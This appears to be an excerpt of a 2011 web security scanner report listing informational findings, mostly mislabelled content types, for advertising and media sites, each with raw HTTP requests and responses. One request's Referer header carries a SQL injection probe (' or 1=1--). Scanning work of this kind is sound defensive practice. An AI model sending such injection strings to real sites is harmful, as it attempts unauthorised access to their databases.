HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:43:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 16:43:32 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
25.67. http://www.networkadvertising.org/managing/optout_results.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:14:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:14:24 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
25.68. http://www.quickandsimple.com/pp-qas-2011-9-7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quickandsimple.com
Path:   /pp-qas-2011-9-7

Request

GET /pp-qas-2011-9-7 HTTP/1.1
Host: www.quickandsimple.com
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/cm/quickandsimple/flash_tmpl/promoplayer/v01/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.quickandsimple.com/; __utma=239537155.514748641.1316294780.1316294780.1316294780.1; __utmb=239537155.1.10.1316294787; __utmc=239537155; __utmz=239537155.1316294787.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_cc=true; s_nr=1316294787226; hm_neworold=New; neworold=8; s_lastvisit=1316294787228; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=Quick%20%26%20Simple%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; rsi_segs=; s_ppv=40

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=553
Date: Sat, 17 Sep 2011 16:39:07 GMT
Content-Length: 5681
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>

<playerpreferences>
           <templatedata>
               <backgroundimage>images/background.png</backgroundimage>
               <timerIntCount>0
...[SNIP]...
25.69. http://www.realage.com/glossary.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realage.com
Path:   /glossary.json

Request

GET /glossary.json HTTP/1.1
Host: www.realage.com
Proxy-Connection: keep-alive
Referer: http://www.realage.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.realage.com/; site_id=56; cookieMemQuery=0; dart_c=; dart_d=; dart_a=; s_cc=true; s_nr=1316294773391; hm_neworold=New; neworold=8; s_lastvisit=1316294773507; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=RealAge%3A%20Index; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=1341
Date: Sat, 17 Sep 2011 16:25:15 GMT
Content-Length: 58855
Connection: close

{"absolutely no glutens" : "Some people are able to tolerate certain kinds of gluten protein, such as the kind found in oats. Patients must work with their doctors to determine which dietary glutens c
...[SNIP]...
25.70. http://www.realage.com/promo-player-homepage-2011-03-25  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realage.com
Path:   /promo-player-homepage-2011-03-25

Request

GET /promo-player-homepage-2011-03-25 HTTP/1.1
Host: www.realage.com
Proxy-Connection: keep-alive
Referer: http://www.realage.com/cm/realage/tmpl_flash/promoplayer/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.realage.com/; site_id=56; cookieMemQuery=0; dart_c=; dart_d=; dart_a=; s_cc=true; s_nr=1316294773391; hm_neworold=New; neworold=8; s_lastvisit=1316294773507; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=RealAge%3A%20Index; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; rsi_segs=; s_ppv=35

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=167
Date: Sat, 17 Sep 2011 16:38:57 GMT
Content-Length: 4817
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>
<playerpreferences>
           <templatedata>
               <backgroundimage>/cm/realage/tmpl_flash/promoplayer/images/background.png</backgroun
...[SNIP]...
25.71. http://www.seventeen.com/api_static/twitter.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /api_static/twitter.json

Request

GET /api_static/twitter.json HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=bd71dea-132794851b8-57f14eef-1; original_referrer=http://hearst.com/newspapers/metrix4media.php; H1E2=0; GID=322D1C219DF0E6D2F3B1A74078599756; __qca=P0-720415249-1316294783725; nexturl=http%3A%2F%2Fwww.seventeen.com%2F; s_cc=true; s_nr=1316294812370; hm_neworold=New; neworold=8; s_lastvisit=1316294812379; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=Seventeen%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; __utma=136237875.746533379.1316294807.1316294807.1316294807.1; __utmb=136237875.1.10.1316294813; __utmc=136237875; __utmz=136237875.1316294813.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=188
Date: Sat, 17 Sep 2011 16:25:42 GMT
Content-Length: 2204
Connection: close

{"statuses_count":14144,"favourites_count":42,"protected":false,"default_profile":false,"profile_text_color":"333333","profile_image_url":"http:\/\/a3.twimg.com\/profile_images\/1429445687\/771e7eec-7
...[SNIP]...
25.72. http://www.thedailygreen.com/api_static/twitter.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /api_static/twitter.json

Request

GET /api_static/twitter.json HTTP/1.1
Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; __unam=383b06c-1327947bdf6-95861c2-1; docloc=http://www.thedailygreen.com/; s_cc=true; s_nr=1316294746871; hm_neworold=New; neworold=8; s_lastvisit=1316294746875; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=The%20Daily%20Green%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; __utma=78940241.1037145031.1316294748.1316294748.1316294748.1; __utmb=78940241.1.10.1316294748; __utmc=78940241; __utmz=78940241.1316294748.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=310
Date: Sat, 17 Sep 2011 16:24:37 GMT
Content-Length: 2058
Connection: close

{"statuses_count":4640,"favourites_count":0,"protected":false,"profile_text_color":"634047","profile_image_url":"http:\/\/a2.twimg.com\/profile_images\/1212036708\/HOG-heart-twitter_normal.jpg","name"
...[SNIP]...
25.73. http://www.thedailygreen.com/homezipfeed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /homezipfeed/

Request

GET /homezipfeed/ HTTP/1.1
Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; __unam=383b06c-1327947bdf6-95861c2-1; docloc=http://www.thedailygreen.com/

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=399
Date: Sat, 17 Sep 2011 16:27:15 GMT
Content-Length: 7347
Connection: close


                   <div class="jsnav_ic">
                       <a href="glines-canyon-dam-removal-0911"><img src="/cm/thedailygreen/images/eu/glines-canyon-dam-th2.jpg" width="130px" height="100px" border="0" class="jsnav_thu
...[SNIP]...
25.74. http://www.thedailygreen.com/promo-homepage-110916  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedailygreen.com
Path:   /promo-homepage-110916

Request

GET /promo-homepage-110916 HTTP/1.1
Host: www.thedailygreen.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/cm/thedailygreen/flash/promoplayer/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; __unam=383b06c-1327947bdf6-95861c2-1; docloc=http://www.thedailygreen.com/

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=389
Date: Sat, 17 Sep 2011 16:27:16 GMT
Content-Length: 4646
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>
    <playerpreferences>
<templatedata>

<backgroundimage>images/background.png</backgroundimage>
<timerIntCount>0</ti
...[SNIP]...
25.75. http://www.tribalfusion.com/test/opt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tribalfusion.com
Path:   /test/opt.js

Request

GET /test/opt.js HTTP/1.1
Host: www.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-store
Content-Type: text/html
Content-Length: 31
Date: Sat, 17 Sep 2011 16:29:22 GMT

var TFID='optout';
OPT_DO();
25.76. http://www.ugo.com/takeover/takeover.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /takeover/takeover.html

Request

GET /takeover/takeover.html?site_zone=ugo.ugo.ugohome/ugohome&pt=mainpage&pos=takeover&sz=800x600 HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cgi-session-id=892E3524-E149-11E0-B2DF-D8F552265BD2; optimizelyEndUserId=oeu1316294750531r0.9246824700385332; optimizelyBuckets=%7B%7D; _vaTC=uuid=-1&cId=3yvaza&track=true&sendSess=true&seq=1&intEngTimeReport=15000&lastAccess=1316294750543; _vaHC=holdout=false; UGOwelcome=welcomeMat:1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:22 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
nnCoection: close
Content-Type: text/html
Cache-Control: private
Content-Length: 2638

<html>
<head><title>UGO Takeover Ad</title>
<script type="text/javascript" language="javascript">
   function returnToRequestedPage() { setTimeout('parent.ShowContent();', 250); }
   function gqp( name )
...[SNIP]...
25.77. http://www.ugo.com/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ugo.com
Path:   /xd_receiver.htm

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316294750531r0.9246824700385332; UGOwelcome=welcomeMat:1; __qca=P0-746893420-1316294814023; base_domain_6606a44d10f0b87a63e3258379b62940=ugo.com; cgi-session-id=3E84637A-E14B-11E0-8409-57FE2AB523E0; optimizelyBuckets=%7B%7D; __utma=240756231.584038807.1316294751.1316294751.1316294751.1; __utmb=240756231.3.10.1316294751; __utmc=240756231; __utmz=240756231.1316294751.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; _vaTC=uuid=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1316295484680; _vaHC=holdout=false; s_sess=%20s_cc%3Dtrue%3B; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:59 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
nnCoection: close
Content-Type: text/html
Cache-Control: private
Content-Length: 312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>xd</title></head><body><script src=
...[SNIP]...
26. Content type incorrectly stated  previous  next
There are 61 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=DLSRD2&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; TOptOut=1; MC1=V=3&GUID=5ac4e212f4dc41e28ae541c631a9a2ed; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=53847eaa577b4a27af787123681cd00c&bd=2011-09-15T16:18:14.634&v=2; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318873684837%26vn%3D1; MSNTVID=5ac4e212f4dc41e28ae541c631a9a2ed; VWCUKP300=L123100/Q80830_15132_2078_091711_1_093011_489193x482893x091711x1x1; s_nr=1316282718696; mbox=session#1316281807974-204714#1316285017|PC#1316281807974-204714.19#1317492757|check#true#1316283217; Sample=3; zip=c:us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2268
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P5162039-T8325135-C1492633
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:56 GMT
Content-Length: 2268


//<![CDATA[
function getRADIds(){return{"adid":"1492633","pid":"5162039","targetid":"8325135"};}if(typeof(inDapIF) != "undefined" && parent._dapUtils.is_ie5up && (parent._dapUtils.majorVer < 9)){pa
...[SNIP]...
26.2. http://a1.interclick.com/getInPageJS.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=53&b=51443&cid=634345102318489365 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642?t=1316294711579&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 22:25:49 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 16:25:48 GMT
Content-Length: 6352

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...
26.3. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=53&b=51443&cid=634345102318489365&isif=t&rurld=www.seattlepi.com&sl=true&dvp=http%3A//www.seattlepi.com/&rurl=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642?t=1316294711579&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 16:25:58 GMT
Content-Length: 318

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3%3Bsz%3D728x90%3Bclick0%3Dhttp%3A//a1.interclick.com/ica
...[SNIP]...
26.4. http://ad.doubleclick.net/pfadx/seventeen_cim/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /pfadx/seventeen_cim/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pfadx/seventeen_cim/;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;ac15=1;ic8=1;ac7=1;ac6=1;ac4=1;ic20=1;ic7=1;sz=24x24;dcmt=text/html;ord=1316294783714? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1596
DCLK_imp: v7;x;245645123;0-0;0;50217680;24/24;42962387/42980174/1;;~aopt=2/2/87/0;~okv=;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;ac15=1;ic8=1;ac7=1;ac6=1;ac4=1;ic20=1;ic7=1;sz=24x24;dcmt=text/html;~cs=n
Date: Sat, 17 Sep 2011 16:36:25 GMT

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;245645123;0-0;0;50217680;24/24;42962387/42980174/1;;~aopt=2/2/87/0;~okv=;secure=false;canopy_allowed=false;posit
...[SNIP]...
26.5. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tase/ad?AdBoxType=15&url=googleoffers.dfa.cities&inv=doubleclick&rnd=1316294720636&esc=0&CustomQuery=zipcode%3D75207%26dma%3D102%26eaid%3D244382735%26epid%3D68093638%26esid%3D791901%26ecid%3D43091605%26ebuy%3D5753751%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316265127425_137664789_as3101_vew|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316276794628_138296936_as3100_imp|374#1316276794628_138296936_as3100_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:26:34 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:26:34 GMT
Content-Length: 2756

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316276794628_138296936_as3100_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316276794628_138296936_as3
...[SNIP]...
26.6. http://amch.questionmarket.com/adscgen/d_layer.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=918801&lang=&from_node=28067&site=8 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/
